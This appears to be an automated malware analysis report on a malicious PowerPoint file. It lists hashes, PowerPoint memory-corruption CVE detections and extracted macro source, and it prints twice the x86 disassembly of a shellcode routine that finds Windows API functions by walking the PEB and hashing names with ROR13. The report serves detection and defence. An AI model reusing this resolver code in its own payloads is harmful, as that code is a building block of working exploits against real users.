Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 8c24a5031a90d5be…

MALICIOUS

Office (OLE)

818.5 KB Created: 2008-01-27 01:25:33 Authoring application: Microsoft PowerPoint First seen: 2012-06-28
MD5: 215787cfcf1d9e5ca21179f3a893361d SHA-1: 1e6b1b2b750dfbd58b6aac40e0fe399e8e5bca9a SHA-256: 8c24a5031a90d5bec758d7ae0b26e8323cda9312043d24a157bb9ca9cd18b878
368 Risk Score

Heuristics 9

  • CVE-2009-0556 — PowerPoint malformed ClientTextbox critical CVE exact CVE_2009_0556
    The PowerPoint record graph contains an Escher ClientTextbox with both OutlineTextRefAtom and TextHeaderAtom children. This is the OffVis-compatible structural condition for the PowerPoint memory corruption vulnerability fixed in MS09-017.
  • PowerPoint binary-format RCE payload — CVE-2011-1269 / MS11-036 family critical CVE likely PPT_BINARY_MEMORY_CORRUPTION_PAYLOAD
    A macro-free binary PowerPoint (.ppt) document carries a native code payload (embedded PE and/or process-injection shellcode), staged in an oversized binary stream. Legitimate presentations do not embed executables or shellcode; this is the payload half of a PowerPoint memory-corruption exploit (CVE-2011-1269 / MS11-036 family; the same record-overflow delivery is shared with CVE-2010-2572 and CVE-2009-0556).
  • ClamAV: Ppt.Exploit.Apptom-10029459-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Ppt.Exploit.Apptom-10029459-0
  • PEB access via FS segment (x86) high SC_PEB_ACCESS
    PEB access via FS segment (x86)
    Disassembly
    x86 disassembly · validity: code (1.0) — 10/10 branch targets land on an instruction boundary (100% coherence)
    00000A07  64a130000000      mov eax, dword ptr fs:[0x30]
00000A0D  8b400c            mov eax, dword ptr [eax + 0xc]
00000A10  8b701c            mov esi, dword ptr [eax + 0x1c]
00000A13  ad                lodsd eax, dword ptr [esi]
00000A14  8b4008            mov eax, dword ptr [eax + 8]
00000A17  5e                pop esi
00000A18  c3                ret
00000A19  60                pushal
00000A1A  8b6c2424          mov ebp, dword ptr [esp + 0x24]
00000A1E  8b453c            mov eax, dword ptr [ebp + 0x3c]
00000A21  8b542878          mov edx, dword ptr [eax + ebp + 0x78]
00000A25  03d5              add edx, ebp
00000A27  8b4a18            mov ecx, dword ptr [edx + 0x18]
00000A2A  8b5a20            mov ebx, dword ptr [edx + 0x20]
00000A2D  03dd              add ebx, ebp
00000A2F  e334              jecxz 0xa65
00000A31  49                dec ecx
00000A32  8b348b            mov esi, dword ptr [ebx + ecx*4]
00000A35  03f5              add esi, ebp
00000A37  33ff              xor edi, edi
00000A39  33c0              xor eax, eax
00000A3B  fc                cld
00000A3C  ac                lodsb al, byte ptr [esi]
00000A3D  84c0              test al, al
00000A3F  7407              je 0xa48
00000A41  c1cf0d            ror edi, 0xd
00000A44  03f8              add edi, eax
00000A46  ebf4              jmp 0xa3c
00000A48  3b7c2428          cmp edi, dword ptr [esp + 0x28]
00000A4C  75e1              jne 0xa2f
00000A4E  8b5a24            mov ebx, dword ptr [edx + 0x24]
00000A51  03dd              add ebx, ebp
00000A53  668b0c4b          mov cx, word ptr [ebx + ecx*2]
00000A57  8b5a1c            mov ebx, dword ptr [edx + 0x1c]
00000A5A  03dd              add ebx, ebp
00000A5C  8b048b            mov eax, dword ptr [ebx + ecx*4]
00000A5F  03c5              add eax, ebp
00000A61  8944241c          mov dword ptr [esp + 0x1c], eax
00000A65  61                popal
00000A66  c2                .byte 0xc2
  • PEB API-hash resolver high SC_API_HASH_RESOLVER
    PEB access followed by ROR13-style API hashing, a common position-independent shellcode import resolver
    Disassembly
    x86 disassembly · validity: code (1.0) — 10/10 branch targets land on an instruction boundary (100% coherence)
    00000A07  64a130000000      mov eax, dword ptr fs:[0x30]
00000A0D  8b400c            mov eax, dword ptr [eax + 0xc]
00000A10  8b701c            mov esi, dword ptr [eax + 0x1c]
00000A13  ad                lodsd eax, dword ptr [esi]
00000A14  8b4008            mov eax, dword ptr [eax + 8]
00000A17  5e                pop esi
00000A18  c3                ret
00000A19  60                pushal
00000A1A  8b6c2424          mov ebp, dword ptr [esp + 0x24]
00000A1E  8b453c            mov eax, dword ptr [ebp + 0x3c]
00000A21  8b542878          mov edx, dword ptr [eax + ebp + 0x78]
00000A25  03d5              add edx, ebp
00000A27  8b4a18            mov ecx, dword ptr [edx + 0x18]
00000A2A  8b5a20            mov ebx, dword ptr [edx + 0x20]
00000A2D  03dd              add ebx, ebp
00000A2F  e334              jecxz 0xa65
00000A31  49                dec ecx
00000A32  8b348b            mov esi, dword ptr [ebx + ecx*4]
00000A35  03f5              add esi, ebp
00000A37  33ff              xor edi, edi
00000A39  33c0              xor eax, eax
00000A3B  fc                cld
00000A3C  ac                lodsb al, byte ptr [esi]
00000A3D  84c0              test al, al
00000A3F  7407              je 0xa48
00000A41  c1cf0d            ror edi, 0xd
00000A44  03f8              add edi, eax
00000A46  ebf4              jmp 0xa3c
00000A48  3b7c2428          cmp edi, dword ptr [esp + 0x28]
00000A4C  75e1              jne 0xa2f
00000A4E  8b5a24            mov ebx, dword ptr [edx + 0x24]
00000A51  03dd              add ebx, ebp
00000A53  668b0c4b          mov cx, word ptr [ebx + ecx*2]
00000A57  8b5a1c            mov ebx, dword ptr [edx + 0x1c]
00000A5A  03dd              add ebx, ebp
00000A5C  8b048b            mov eax, dword ptr [ebx + ecx*4]
00000A5F  03c5              add eax, ebp
00000A61  8944241c          mov dword ptr [esp + 0x1c], eax
00000A65  61                popal
00000A66  c2                .byte 0xc2
  • OLE file contains raw shellcode-like resolver payload high OLE_RAW_SHELLCODE_PAYLOAD
    Malformed or legacy OLE file contains raw PEB/API-resolver shellcode bytes at the file level, including loader-walk instructions and a nearby payload marker. This indicates an exploit payload carrier but does not identify a specific parser CVE.
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        Set xlApp = CreateObject("Excel.Application")
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1005 bytes
SHA-256: 7403e4728955600b20e1b11715dae9328df16f95bc7db40bf64d8dfe55835d1d
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Module1"
Sub AutoOpen()
'Parametre [Fichier PPT] [Nom de la macro]
c = Command()
cl = InStr(c, " ")
c1 = Left(c, cl - 1)
c2 = Right(c, Len(c) - cl)
Dim a As New PowerPoint.Application
a.WindowState = ppWindowMaximized
a.Visible = True
a.Presentations.Open c1
a.Run (c1 & "!" & c2)
Set a = Nothing


End Sub

Dim xlApp As excel.Application
Dim xlBook As excel.workbook

Sub test()

    'lancer le fichier excel
    Set xlApp = CreateObject("Excel.Application")
    Set xlBook = xlApp.workbooks.Open("chemin_du_fichier.xls")
    xlApp.Visible = True
    
End Sub

Sub valid()

    'lancer valider de excel
    xlApp.Run "feuil2.valider"

End Sub

Attribute VB_Name = "Classe1"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Open this report in the interactive analyzer, or submit your own file for analysis.